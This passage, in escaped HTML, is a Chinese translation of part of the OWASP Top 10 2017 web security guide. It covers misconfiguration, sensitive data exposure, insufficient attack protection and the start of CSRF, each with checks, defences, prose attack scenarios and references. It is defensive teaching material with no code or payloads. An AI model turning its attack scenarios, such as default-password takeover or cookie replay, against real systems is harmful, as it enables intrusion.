\u7684\u52a0\u56fa\u8fc7\u7a0b\u3002\u5f00\u53d1\u3001\u8d28\u91cf\u4fdd\u8bc1\u548c\u751f\u4ea7\u73af\u5883\u90fd\u5e94\u8be5\u914d\u7f6e \u76f8\u540c\uff08\u6bcf\u4e2a\u73af\u5883\u4e2d\u4f7f\u7528\u4e0d\u540c\u7684\u5bc6\u7801\uff09\u3002\u8fd9\u4e2a\u8fc7\u7a0b\u5e94\u8be5 \u662f\u81ea\u52a8\u5316\u7684\uff0c\u4ee5\u5c3d\u91cf\u51cf\u5c11\u5b89\u88c5\u4e00\u4e2a\u65b0\u5b89\u5168\u73af\u5883\u7684\u8017\u8d39.<\/p>\n<ol start=\"2\">\n<li>\u4e00\u4e2a\u80fd\u53ca\u65f6\u4e86\u89e3\u5e76\u90e8\u7f72\u6bcf\u4e2a\u5df2\u90e8\u7f72\u73af\u5883\u7684\u6240\u6709\u6700\u65b0\u8f6f \u4ef6\u66f4\u65b0\u548c\u8865\u4e01\u7684\u8fc7\u7a0b\u3002\u8fd9\u9700\u8981\u5305\u62ec\u901a\u5e38\u88ab\u5ffd\u7565\u7684\u6240\u6709 \u4ee3\u7801\u7684\u5e93\u6587\u4ef6\uff08\u8be6\u89c12017-A9 \uff09\u3002 <\/li>\n<\/ol>\n<p>3.\u4e00\u4e2a\u80fd\u5728\u7ec4\u4ef6\u4e4b\u95f4\u63d0\u4f9b\u6709\u6548\u7684\u5206\u79bb\u548c\u5b89\u5168\u6027\u7684\u5f3a\u5927\u5e94 \u7528\u7a0b\u5e8f\u67b6\u6784\u3002 <\/p>\n<p>4.\u4e00\u4e2a\u81ea\u52a8\u5316\u8fc7\u7a0b\u6765\u9a8c\u8bc1\u5728\u6240\u6709\u73af\u5883\u4e2d\u914d\u7f6e\u548c\u8bbe\u7f6e\u662f\u5426\u6b63\u786e\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1: Th\u5e94\u7528\u7a0b\u5e8f\u670d\u52a1\u5668\u7ba1\u7406\u5458\u63a7\u5236\u53f0\u81ea\u52a8\u5b89\u88c5\u540e\u6ca1\u6709 \u88ab\u5220\u9664\u3002\u800c\u9ed8\u8ba4\u5e10\u6237\u4e5f\u6ca1\u6709\u88ab\u6539\u53d8\u3002\u653b\u51fb\u8005\u5728\u4f60\u7684\u670d\u52a1\u5668 \u4e0a\u53d1\u73b0\u4e86\u6807\u51c6\u7684\u7ba1\u7406\u5458\u9875\u9762\uff0c\u901a\u8fc7\u9ed8\u8ba4\u5bc6\u7801\u767b\u5f55\uff0c\u4ece\u800c\u63a5 \u7ba1\u4e86\u4f60\u7684\u670d\u52a1\u5668\u3002<\/p>\n<p>\u6848\u4f8b #2:\u76ee\u5f55\u5217\u8868\u5728\u4f60\u7684\u670d\u52a1\u5668\u4e0a\u672a\u88ab\u7981\u7528\u3002\u653b\u51fb\u8005\u53d1 \u73b0\u53ea\u9700\u5217\u51fa\u76ee\u5f55\uff0c\u5979\u5c31\u53ef\u4ee5\u627e\u5230\u4f60\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\u3002 \u653b\u51fb\u8005\u627e\u5230\u5e76\u4e0b\u8f7d\u6240\u6709\u5df2\u7f16\u8bd1\u7684Java\u7c7b\uff0c\u5979\u901a\u8fc7\u53cd\u7f16\u8bd1\u83b7 \u5f97\u4e86\u6240\u6709\u4f60\u7684\u81ea\u5b9a\u4e49\u4ee3\u7801\u3002\u7136\u540e\uff0c\u5979\u5728\u4f60\u7684\u5e94\u7528\u7a0b\u5e8f\u4e2d\u627e \u5230\u4e00\u4e2a\u8bbf\u95ee\u63a7\u5236\u7684\u4e25\u91cd\u6f0f\u6d1e\u3002<\/p>\n<p>\u6848\u4f8b #3:\u5e94\u7528\u670d\u52a1\u5668\u914d\u7f6e\u5141\u8bb8\u5806\u6808\u8ddf\u8e2a\u8fd4\u56de\u7ed9\u7528\u6237\uff0c\u8fd9 \u6837\u5c31\u66b4\u9732\u4e86\u6f5c\u5728\u7684\u6f0f\u6d1e\uff0c\u4f8b\u5982\u5df2\u77e5\u6613\u53d7\u653b\u51fb\u7684\u6846\u67b6\u7248\u672c\u3002<\/p>\n<p>\u6848\u4f8b #4:\u5e94\u7528\u670d\u52a1\u5668\u81ea\u5e26\u7684\u793a\u4f8b\u5e94\u7528\u7a0b\u5e8f\u6ca1\u6709\u4ece\u60a8\u7684\u751f \u4ea7\u670d\u52a1\u5668\u4e2d\u5220\u9664\u3002\u8be5\u793a\u4f8b\u5e94\u7528\u6709\u5df2\u77e5\u5b89\u5168\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef \u4ee5\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\u7834\u574f\u60a8\u7684\u670d\u52a1\u5668\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP Development Guide: Chapter on Configuration <\/p>\n<p>\u2022 OWASP Code Review Guide: Chapter on Error Handling <\/p>\n<p>\u2022 OWASP Testing Guide: Configuration Management <\/p>\n<p>\u2022 OWASP Testing Guide: Testing for Error Codes <\/p>\n<p>\u2022 OWASP Top 10 2004 - Insecure Configuration Management<\/p>\n<p>\u4e3a\u4e86\u66f4\u8be6\u5c3d\u7684\u4e86\u89e3\u8be5\u9886\u57df\u7684\u9700\u6c42\u4fe1\u606f\uff0c\u8bf7\u53c2\u89c1 ASVS requirements areas for Security Configuration (V11 and V19).<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 NIST Guide to General Server Hardening <\/p>\n<p>\u2022 CWE Entry 2 on Environmental Security Flaws <\/p>\n<p>\u2022 CIS Security Configuration Guides\/Benchmarks<\/p>\n<p>A6<\/p>\n<p>\u654f\u611f\u4fe1\u606f\u6cc4\u9732<\/p>\n<p>\u6211\u6613\u53d7\u653b\u51fb\u4e48?<\/p>\n<p>\u9996\u5148\u4f60\u9700\u8981\u786e\u8ba4\u7684\u662f\u54ea\u4e9b\u6570\u636e\u662f\u654f\u611f\u6570\u636e\u800c\u9700\u8981\u88ab\u52a0\u5bc6\u3002 \u4f8b\u5982\uff1a\u5bc6\u7801\u3001\u4fe1\u7528\u5361\u3001\u533b\u7597\u8bb0\u5f55\u3001\u4e2a\u4eba\u4fe1\u606f\u5e94\u8be5\u88ab\u52a0\u5bc6\u3002 \u5bf9\u4e8e\u8fd9\u4e9b\u6570\u636e\uff0c\u8981\u786e\u4fdd\uff1a<\/p>\n<p>1.\u5f53\u8fd9\u4e9b\u6570\u636e\u88ab\u957f\u671f\u5b58\u50a8\u7684\u65f6\u5019\uff0c\u65e0\u8bba\u5b58\u50a8\u5728\u54ea\u91cc\uff0c\u5b83 \u4eec\u662f\u5426\u90fd\u88ab\u52a0\u5bc6\uff0c\u7279\u522b\u662f\u5bf9\u8fd9\u4e9b\u6570\u636e\u7684\u5907\u4efd\uff1f <\/p>\n<p>2.\u65e0\u8bba\u5185\u90e8\u6570\u636e\u8fd8\u662f\u5916\u90e8\u6570\u636e\uff0c\u4f20\u8f93\u65f6\u662f\u5426\u662f\u660e\u6587\u4f20\u8f93\uff1f \u5728\u4e92\u8054\u7f51\u4e2d\u4f20\u8f93\u660e\u6587\u6570\u636e\u662f\u975e\u5e38\u5371\u9669\u7684\u3002<\/p>\n<p>3.\u662f\u5426\u8fd8\u5728\u4f7f\u7528\u4efb\u4f55\u65e7\u7684\u6216\u8106\u5f31\u7684\u52a0\u5bc6\u7b97\u6cd5\uff1f <\/p>\n<p>4.\u52a0\u5bc6\u5bc6\u94a5\u7684\u751f\u6210\u662f\u5426\u662f\u8106\u5f31\u7684\uff0c\u6216\u8005\u7f3a\u5c11\u6070\u5f53\u7684\u5bc6\u94a5 \u7ba1\u7406\u6216\u7f3a\u5c11\u5bc6\u94a5\u56de\u8f6c\uff1f <\/p>\n<p>5.\u5f53\u6d4f\u89c8\u5668\u63a5\u6536\u6216\u53d1\u9001\u654f\u611f\u6570\u636e\u65f6\uff0c\u662f\u5426\u6709\u6d4f\u89c8\u5668\u5b89\u5168 \u6307\u4ee4\u6216\u5934\u6587\u4ef6\u4e22\u5931\uff1f<\/p>\n<p>\u8fd8\u6709\u66f4\u591a\u00b7\u00b7\u00b7\u5173\u4e8e\u5728\u8fd9\u4e00\u9886\u57df\u5e94\u8be5\u907f\u514d\u7684\u66f4\u591a\u95ee\u9898\u8bf7\u53c2\u89c1ASVS areas Crypto (V7), Data Prot (V9), and SSL\/TLS (V10).<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u6709\u5173\u4f7f\u7528\u4e0d\u5b89\u5168\u7684\u52a0\u5bc6\u7b97\u6cd5\u3001SSL\u4f7f\u7528\u548c\u6570\u636e\u4fdd\u62a4\u7684\u98ce\u9669 \u8d85\u51fa\u4e86Top 10\u7684\u8303\u56f4\u3002\u5c3d\u7ba1\u5982\u6b64\uff0c\u5bf9\u4e00\u4e9b\u9700\u8981\u52a0\u5bc6\u7684\u654f\u611f \u6570\u636e\uff0c\u5e94\u8be5\u8d77\u7801\u505a\u5230\u4ee5\u4e0b\u51e0\u70b9\uff1a<\/p>\n<p>1.\u9884\u6d4b\u4e00\u4e9b\u5a01\u80c1\uff08\u6bd4\u5982\u5185\u90e8\u653b\u51fb\u548c\u5916\u90e8\u7528\u6237\uff09\uff0c\u52a0\u5bc6\u8fd9 \u4e9b\u6570\u636e\u7684\u5b58\u50a8\u4ee5\u786e\u4fdd\u514d\u53d7\u8fd9\u4e9b\u5a01\u80c1\u3002 <\/p>\n<p>2.\u5bf9\u4e8e\u6ca1\u5fc5\u8981\u5b58\u653e\u7684\u3001\u91cd\u8981\u7684\u654f\u611f\u6570\u636e\uff0c\u5e94\u5f53\u5c3d\u5feb\u6e05\u9664\u3002 <\/p>\n<p>3.\u786e\u4fdd\u4f7f\u7528\u4e86\u5408\u9002\u7684\u5f3a\u5927\u7684\u6807\u51c6\u7b97\u6cd5\u548c\u5f3a\u5927\u7684\u5bc6\u5319\uff0c\u5e76 \u4e14\u5bc6\u5319\u7ba1\u7406\u5230\u4f4d\u3002\u53ef\u53c2\u8003FIPS 140 validated cryptographic modules. <\/p>\n<p>4.\u786e\u4fdd\u4f7f\u7528\u5bc6\u7801\u4e13\u7528\u7b97\u6cd5\u5b58\u50a8\u5bc6\u7801\uff0c\u5982\uff1abcrypt, PBKDF2, \u6216\u8005 scrypt. <\/p>\n<p>5.\u7981\u7528\u81ea\u52a8\u5b8c\u6210\u9632\u6b62\u654f\u611f\u6570\u636e\u6536\u96c6\uff0c\u7981\u7528\u5305\u542b\u654f\u611f\u6570\u636e \u7684\u7f13\u5b58\u9875\u9762\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1\uff1a\u4e00\u4e2a\u5e94\u7528\u7a0b\u5e8f\u52a0\u5bc6\u5b58\u50a8\u5728\u6570\u636e\u5e93\u7684\u4fe1\u7528\u5361\u4fe1\u606f\uff0c \u4ee5\u9632\u6b62\u4fe1\u7528\u5361\u4fe1\u606f\u66b4\u9732\u7ed9\u6700\u7ec8\u7528\u6237\u3002\u4f46\u662f\uff0c\u6570\u636e\u5e93\u8bbe\u7f6e\u4e3a \u5bf9\u4fe1\u7528\u5361\u8868\u5217\u7684\u67e5\u8be2\u8fdb\u884c\u81ea\u52a8\u89e3\u5bc6\uff0c\u8fd9\u5c31\u4f7f\u5f97SQL\u6ce8\u5165\u6f0f \u6d1e\u80fd\u591f\u83b7\u5f97\u6240\u6709\u4fe1\u7528\u5361\u4fe1\u606f\u7684\u660e\u6587\u3002\u5907\u9009\u65b9\u6848\u5305\u62ec\u4e0d\u5b58\u50a8\u4fe1\u7528\u5361\u53f7\u7801\uff0c\u4f7f\u7528\u6807\u8bb0\u5316\u6216\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u3002<\/p>\n<p>\u6848\u4f8b #2: \u4e00\u4e2a\u7f51\u7ad9\u4e0a\u6240\u6709\u9700\u8981\u8eab\u4efd\u9a8c\u8bc1\u7684\u7f51\u9875\u90fd\u6ca1\u6709\u4f7f \u7528SSL\u3002\u653b\u51fb\u8005\u53ea\u9700\u76d1\u63a7\u7f51\u7edc\u6570\u636e\u6d41\uff08\u6bd4\u5982\u4e00\u4e2a\u5f00\u653e\u7684\u65e0 \u7ebf\u7f51\u7edc\u6216\u5176\u793e\u533a\u7684\u6709\u7ebf\u7f51\u7edc\uff09\uff0c\u5e76\u7a83\u53d6\u4e00\u4e2a\u5df2\u9a8c\u8bc1\u7684\u53d7\u5bb3 \u8005\u7684\u4f1a\u8bddcookie\u3002\u7136\u540e\uff0c\u653b\u51fb\u8005\u5229\u7528\u8fd9\u4e2acookie\u6267\u884c\u91cd\u653e \u653b\u51fb\u5e76\u63a5\u7ba1\u7528\u6237\u7684\u4f1a\u8bdd\u4ece\u800c\u8bbf\u95ee\u7528\u6237\u7684\u9690\u79c1\u6570\u636e\u3002<\/p>\n<p>\u6848\u4f8b #3\uff1a\u5bc6\u7801\u6570\u636e\u5e93\u4f7f\u7528unsalted\u7684\u54c8\u5e0c\u7b97\u6cd5\u53bb\u5b58\u50a8\u6bcf\u4e2a \u4eba\u7684\u5bc6\u7801\u3002\u4e00\u4e2a\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u4f7f\u9ed1\u5ba2\u80fd\u591f\u83b7\u53d6\u5bc6\u7801\u6587\u4ef6\u3002\u6240\u6709\u8fd9\u4e9bunsalted\u54c8\u5e0c\u7684\u5bc6\u7801\u901a\u8fc7\u5f69\u8679\u8868\u66b4\u529b\u7834\u89e3\u65b9\u5f0f\u7834 \u89e3\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP <\/p>\n<p>-\u4e3a\u4e86\u66f4\u8be6\u5c3d\u7684\u4e86\u89e3\u8be5\u9886\u57df\u7684\u76f8\u5173\u9700\u6c42\u548c\u56e0\u907f\u514d\u7684\u76f8\u5173\u95ee\u9898\uff0c\u8bf7\u53c2\u89c1ASVS req\u2019ts on Cryptography (V7), Data Protection (V9) \u548c Communications Security (V10)<\/p>\n<p>\u2022 OWASP Cryptographic Storage Cheat Sheet <\/p>\n<p>\u2022 OWASP Password Storage Cheat Sheet <\/p>\n<p>\u2022 OWASP Transport Layer Protection Cheat Sheet <\/p>\n<p>\u2022 OWASP Testing Guide: Chapter on SSL\/TLS Testing<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 CWE Entry 310 on Cryptographic Issues <\/p>\n<p>\u2022 CWE Entry 312 on Cleartext Storage of Sensitive Information <\/p>\n<p>\u2022 CWE Entry 319 on Cleartext Transmission of Sensitive Information <\/p>\n<p>\u2022 CWE Entry 326 on Weak Encryption<\/p>\n<p>A7<\/p>\n<p>\u653b\u51fb\u68c0\u6d4b\u4e0e\u9632\u8303\u4e0d\u8db3<\/p>\n<p>\u6211\u5bb9\u6613\u53d7\u653b\u51fb\u5417?<\/p>\n<p>\u68c0\u6d4b\uff0c\u54cd\u5e94\u548c\u963b\u6b62\u653b\u51fb\u4f7f\u5e94\u7528\u7a0b\u5e8f\u7684\u6f0f\u6d1e\u66f4\u96be\u4ee5\u5229\u7528\uff0c\u4f46\u51e0\u4e4e\u6ca1\u6709\u4efb\u4f55\u5e94\u7528\u7a0b\u5e8f\u6216API\u5177\u6709\u6b64\u7c7b\u4fdd\u62a4\u3002 \u901a\u7528\u4ee3\u7801\u548c\u7ec4\u4ef6\u4e2d\u7684\u5371\u9669\u6f0f\u6d1e\u53ef\u5728\u4efb\u4f55\u65f6\u5019\u88ab\u53d1\u73b0\uff0c\u4f46\u7ec4\u7ec7\u901a\u5e38\u9700\u8981\u51e0\u5468\u751a\u81f3\u51e0\u4e2a\u6708\u624d\u80fd\u63a8\u51fa\u65b0\u7684\u9632\u5fa1\u65b9\u6848\u3002<\/p>\n<p>\u5982\u679c\u653b\u51fb\u68c0\u6d4b\u548c\u54cd\u5e94\u4e0d\u5230\u4f4d\u5e94\u8be5\u662f\u975e\u5e38\u660e\u663e\u7684\u3002 \u53ea\u9700\u5c1d\u8bd5\u624b\u52a8\u653b\u51fb\u6216\u9488\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fd0\u884c\u626b\u63cf\u5668\u3002 \u5e94\u7528\u7a0b\u5e8f\u6216API\u5e94\u8be5\u8bc6\u522b\u653b\u51fb\uff0c\u963b\u6b62\u4efb\u4f55\u53ef\u884c\u7684\u653b\u51fb\uff0c\u5e76\u8bc6\u522b\u6536\u96c6\u653b\u51fb\u8005\u7684\u7ec6\u8282\u548c\u653b\u51fb\u7684\u7279\u5f81\u3002 \u5982\u679c\u5728\u53d1\u73b0\u5173\u952e\u6f0f\u6d1e\u65f6\u65e0\u6cd5\u5feb\u901f\u63a8\u51fa\u865a\u62df\u548c\/\u6216\u5b9e\u9645\u8865\u4e01\uff0c\u5219\u4f1a\u53d7\u5230\u653b\u51fb\u3002<\/p>\n<p>\u4e00\u5b9a\u8981\u4e86\u89e3\u9488\u5bf9\u653b\u51fb\u7684\u9632\u8303\u63aa\u65bd\u6240\u80fd\u8986\u76d6\u7684\u653b\u51fb\u7c7b\u578b\uff0c\u4e0d\u5e94\u8be5\u53ea\u662fXSS\u548cSQL\u6ce8\u5165\u3002 \u4f60\u53ef\u4ee5\u901a\u8fc7\u5982 WAFs, RASP, \u548c OWASP AppSensor \u7b49\u6280\u672f\u6765\u68c0\u6d4b\u5e76\u963b\u6b62\u653b\u51fb\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u5408\u683c\u7684\u7684\u653b\u51fb\u4fdd\u62a4\u6709\u4e09\u4e2a\u4e3b\u8981\u76ee\u6807:<\/p>\n<p>1.\u68c0\u6d4b\u653b\u51fb \u3002\u6709\u6ca1\u6709\u53d1\u751f\u5408\u6cd5\u7528\u6237\u4e0d\u53ef\u80fd\u4ea7\u751f\uff08\u4f8b\u5982\uff0c\u6b63\u5e38\u7528\u6237\u4f7f\u7528\u5ba2\u6237\u7aef\u65e0\u6cd5\u751f\u6210\u7684\u8f93\u5165\uff09\u7684\u60c5\u51b5\uff1f \u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u4ee5\u666e\u901a\u7528\u6237\u6c38\u8fdc\u4e0d\u4f1a\u505a\u7684\u65b9\u5f0f\u8fd0\u884c\uff08\u4f8b\u5982\uff0c\u8bf7\u6c42\u9891\u7387\u592a\u9ad8\uff0c\u975e\u5178\u578b\u8f93\u5165\uff0c\u5f02\u5e38\u4f7f\u7528\u6a21\u5f0f\uff0c\u91cd\u590d\u8bf7\u6c42\uff09\uff1f <\/p>\n<p>2.\u5bf9\u653b\u51fb\u7684\u54cd\u5e94\u3002\u65e5\u5fd7\u548c\u901a\u77e5\u5bf9\u53ca\u65f6\u54cd\u5e94\u81f3\u5173\u91cd\u8981\u3002\u8003\u8651\u662f\u5426\u81ea\u52a8\u963b\u6b62\u8bf7\u6c42\uff0c\u5e76\u786e\u5b9a\u963b\u6b62\u7684IP\u5730\u5740\u6216IP\u6bb5\u3002 \u8003\u8651\u7981\u7528\u6216\u76d1\u63a7\u4e0d\u826f\u884c\u4e3a\u7684\u7528\u6237\u5e10\u6237\u3002 <\/p>\n<p>3.\u5feb\u901f\u4fee\u590d\u3002\u5982\u679c\u60a8\u7684\u5f00\u53d1\u6216\u8fd0\u7ef4\u56e2\u961f\u65e0\u6cd5\u5728\u4e00\u5929\u5185\u63a8\u51fa\u5173\u952e\u4fee\u8865\u7a0b\u5e8f\uff0c\u8bf7\u90e8\u7f72\u4e00\u4e2a\u53ef\u4ee5\u5206\u6790HTTP\u6d41\u91cf\uff0c\u6570\u636e\u6d41\u548c\/\u6216\u4ee3\u7801\u6267\u884c\u7684\u865a\u62df\u8865\u4e01\uff0c\u5e76\u9632\u6b62\u6f0f\u6d1e\u88ab\u5229\u7528\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1:\u653b\u51fb\u8005\u4f7f\u7528\u81ea\u52a8\u5316\u5de5\u5177\uff08\u5982OWASP ZAP\u6216SQLMap\uff09\u6765\u68c0\u6d4b\u6f0f\u6d1e\u5e76\u53ef\u80fd\u5229\u7528\u5b83\u4eec\u3002\u653b\u51fb\u68c0\u6d4b\u5e94\u8be5\u4ee5\u8bc6\u522b\u5e94\u7528\u7a0b\u5e8f\u7684\u5f02\u5e38\u8bf7\u6c42\u548c\u5de8\u5927\u6d41\u91cf\u4e3a\u76ee\u6807\u3002\u81ea\u52a8\u626b\u63cf\u5e94\u6613\u4e8e\u4e0e\u6b63\u5e38\u6d41\u91cf\u533a\u5206\u5f00\u6765\u3002<\/p>\n<p>\u6848\u4f8b #2:\u719f\u7ec3\u7684\u653b\u51fb\u8005\u4f7f\u7528\u4ed4\u7ec6\u6316\u6398\u6f5c\u5728\u7684\u6f0f\u6d1e\uff0c\u6700\u7ec8\u786e\u8ba4\u4e86\u4e00\u4e2a\u96be\u4ee5\u53d1\u73b0\u7684\u7f3a\u9677\u3002<\/p>\n<p>\u867d\u7136\u96be\u4ee5\u68c0\u6d4b\uff0c\u4f46\u8fd9\u79cd\u653b\u51fb\u4ecd\u7136\u5305\u542b\u6b63\u5e38\u7528\u6237\u6c38\u8fdc\u4e0d\u4f1a\u53d1\u9001\u7684\u8bf7\u6c42\uff0c\u4f8b\u5982UI\u4e0d\u5141\u8bb8\u7684\u8f93\u5165\u3002\u8ddf\u8e2a\u8fd9\u4e2a\u653b\u51fb\u8005\u53ef\u80fd\u9700\u8981\u5efa\u7acb\u4e00\u4e2a\u65f6\u95f4\u8868\u73b0\u6076\u610f\u7684\u6848\u4f8b\u3002<\/p>\n<p>\u6848\u4f8b #3:\u653b\u51fb\u8005\u5f00\u59cb\u5229\u7528\u5e94\u7528\u7a0b\u5e8f\u4e2d\u7684\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u4f46\u60a8\u5f53\u524d\u7684\u653b\u51fb\u4fdd\u62a4\u65e0\u6cd5\u963b\u6b62\u3002<\/p>\n<p>\u60a8\u53ef\u4ee5\u5feb\u901f\u90e8\u7f72\u4e00\u4e2a\u771f\u6b63\u7684\u6216\u865a\u62df\u7684\u8865\u4e01\u6765\u963b\u6b62\u5bf9\u6b64\u6f0f\u6d1e\u7684\u6301\u7eed\u5229\u7528\uff1f<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP Article on Intrusion Detection <\/p>\n<p>\u2022 OWASP AppSensor <\/p>\n<p>\u2022 OWASP Automated Threats Project <\/p>\n<p>\u2022 OWASP Credential Stuffing Cheat Sheet <\/p>\n<p>\u2022 OWASP Virtual Patching Cheat Sheet <\/p>\n<p>\u2022 OWASP Mod Security Core Ruleset<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 WASC Article on Insufficient Anti-automation <\/p>\n<p>\u2022 CWE Entry 778 - Insufficient Logging <\/p>\n<p>\u2022 CWE Entry 799 - Improper Control of Interaction Frequency<\/p>\n<p>A8<\/p>\n<p>\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020(CSRF)<\/p>\n<p>\u6211\u5b58\u5728CSRF\u6f0f\u6d1e?<\/p>\n<p>\u68c0\u6d4b\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u5b58\u5728\u8be5\u6f0f\u6d1e\u7684\u65b9\u6cd5\u662f\u67e5\u770b\u662f\u5426\u6bcf\u4e2a\u94fe\u63a5 \u548c\u8868\u5355\u90fd\u63d0\u4f9b\u4e86\u4e0d\u53ef\u9884\u6d4b\u7684CSRF\u4ee4\u724c\u3002\u6ca1\u6709\u8fd9\u6837\u7684\u4ee4\u724c\uff0c\u653b\u51fb\u8005\u5c31\u80fd\u591f\u4f2a\u9020\u6076\u610f\u8bf7\u6c42\u3002\u53e6\u4e00\u79cd\u9632\u5fa1\u7684\u65b9\u6cd5\u662f\u8981\u6c42\u7528 \u6237\u8bc1\u660e\u4ed6\u4eec\u8981\u63d0\u4ea4\u8bf7\u6c42\uff0c\u6bd4\u5982\u901a\u8fc7\u91cd\u65b0\u8ba4\u8bc1\u7684\u65b9\u5f0f\u3002<\/p>\n<p>\u91cd\u70b9\u5173\u6ce8\u90a3\u4e9b\u8c03\u7528\u80fd\u591f\u6539\u53d8\u72b6\u6001\u529f\u80fd\u7684\u94fe\u63a5\u548c\u8868\u683c\uff0c\u56e0\u4e3a \u4ed6\u4eec\u662f\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u653b\u51fb\u7684\u6700\u91cd\u8981\u7684\u76ee\u6807\u3002\u7531\u4e8e\u591a\u6b65\u4ea4\u6613\u5e76\u4e0d\u5177\u5907\u5185\u5728\u7684\u9632\u653b\u51fb\u80fd\u529b\uff0c\u56e0\u6b64\u6211\u4eec\u9700\u8981 \u68c0\u6d4b\u8fd9\u4e9b\u4ea4\u6613\u3002\u8fd8\u8981\u6ce8\u610f\uff0c\u670d\u52a1\u5668\u7aef\u8bf7\u6c42\u4f2a\u9020\uff08SSRF\uff09\u4e5f\u53ef\u4ee5\u901a\u8fc7\u6b3a\u9a97\u5e94\u7528\u548cAPI\u6765\u751f\u6210\u4efb\u610fHTTP\u8bf7\u6c42\u3002<\/p>\n<p>\u8bf7\u6ce8\u610f\uff1a\u4f1a\u8bddcookie\u3001\u6e90IP\u5730\u5740\u548c\u5176\u4ed6\u6d4f\u89c8\u5668\u81ea\u52a8\u53d1\u9001\u7684 \u4fe1\u606f\u4e0d\u80fd\u4f5c\u4e3a\u9632\u653b\u51fb\u4ee4\u724c\uff0c\u56e0\u4e3a\u8fd9\u4e9b\u4fe1\u606f\u5df2\u7ecf\u5305\u542b\u5728\u4f2a\u9020 \u7684\u8bf7\u6c42\u4e2d\u3002 OWASP\u7684CSRF\u6d4b\u8bd5\u5de5\u5177\u6709\u52a9\u4e8e\u751f\u6210\u6d4b\u8bd5\u6848\u4f8b\uff0c\u53ef\u7528\u4e8e\u5c55\u793a \u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e\u7684\u5371\u5bb3\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62CSRF?<\/p>\n<p>\u9996\u9009\u65b9\u6848\u662f\u4f7f\u7528\u73b0\u6709\u7684CSRF\u9632\u5fa1\u63aa\u65bd\u3002\u8bb8\u591a\u6846\u67b6\u73b0\u5728\u5305\u62ec\u5185\u7f6e\u7684CSRF\u9632\u5fa1\uff0c\u5982Spring\uff0cPlay\uff0cDjango\u548cAngularJS\u3002 \u4e00\u4e9bWeb\u5f00\u53d1\u8bed\u8a00\uff0c\u5982.NET\u4e5f\u662f\u5982\u6b64\u3002 OWASP\u7684CSRF Guard\u53ef\u4ee5\u81ea\u52a8\u5c06CSRF\u9632\u5fa1\u6dfb\u52a0\u5230Java\u5e94\u7528\u7a0b\u5e8f\u3002 OWASP\u7684CSRFProtector\u5bf9\u4e8ePHP\u6216Apache\u6709\u7740\u76f8\u540c\u7684\u8fc7\u6ee4\u4f5c\u7528\u3002<\/p>\n<p>\u5426\u5219\uff0c\u963b\u6b62CSRF\u901a\u5e38\u9700\u8981\u5728\u6bcf\u4e2aHTTP\u8bf7\u6c42\u4e2d\u5305\u542b\u4e0d\u53ef\u9884\u6d4b\u7684\u4ee4\u724c\u3002\u5e76\u4e14\u8fd9\u79cd\u4ee4\u724c\u5728\u6bcf\u4e2a\u7528\u6237\u4f1a\u8bdd\u4e2d\u90fd\u662f\u552f\u4e00\u7684\u3002<\/p>\n<p>1.\u6700\u597d\u7684\u65b9\u6cd5\u662f\u5c06\u72ec\u6709\u7684\u4ee4\u724c\u5305\u542b\u5728\u4e00\u4e2a\u9690\u85cf\u5b57\u6bb5\u4e2d\u3002 \u8fd9\u5c06\u4f7f\u5f97\u8be5\u4ee4\u724c\u901a\u8fc7HTTP\u8bf7\u6c42\u4f53\u53d1\u9001\uff0c\u907f\u514d\u5176\u5305\u542b\u5728 URL\u4e2d\u4ece\u800c\u88ab\u66b4\u9732\u51fa\u6765\u3002 <\/p>\n<p>2.\u8be5\u72ec\u6709\u4ee4\u724c\u540c\u6837\u53ef\u4ee5\u5305\u542b\u5728URL\u4e2d\u6216\u4f5c\u4e3a\u4e00\u4e2aURL\u53c2\u6570\u3002 \u4f46\u662f\u8fd9\u79cd\u65b9\u6cd5\u7684\u5de8\u5927\u98ce\u9669\u5728\u4e8e\uff1aURL\u4f1a\u66b4\u9732\u7ed9\u653b\u51fb\u8005\uff0c \u8fd9\u6837\u79d8\u5bc6\u4ee4\u724c\u4e5f\u4f1a\u88ab\u6cc4\u6f0f\u3002 <\/p>\n<p>3.\u8003\u8651\u5728\u6240\u6709Cookie\u4e2d\u4f7f\u7528\u201cSameSite = strict\u201d\u6807\u5fd7\uff0c\u8fd9\u5728\u6d4f\u89c8\u5668\u4e2d\u8d8a\u6765\u8d8a\u53d7\u5230\u652f\u6301\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u5e94\u7528\u7a0b\u5e8f\u5141\u8bb8\u7528\u6237\u63d0\u4ea4\u4e0d\u5305\u542b\u4efb\u4f55\u4fdd\u5bc6\u5b57\u6bb5\u7684\u72b6\u6001\u6539\u53d8\u8bf7 \u6c42\uff0c\u5982:<\/p>\n<p><a 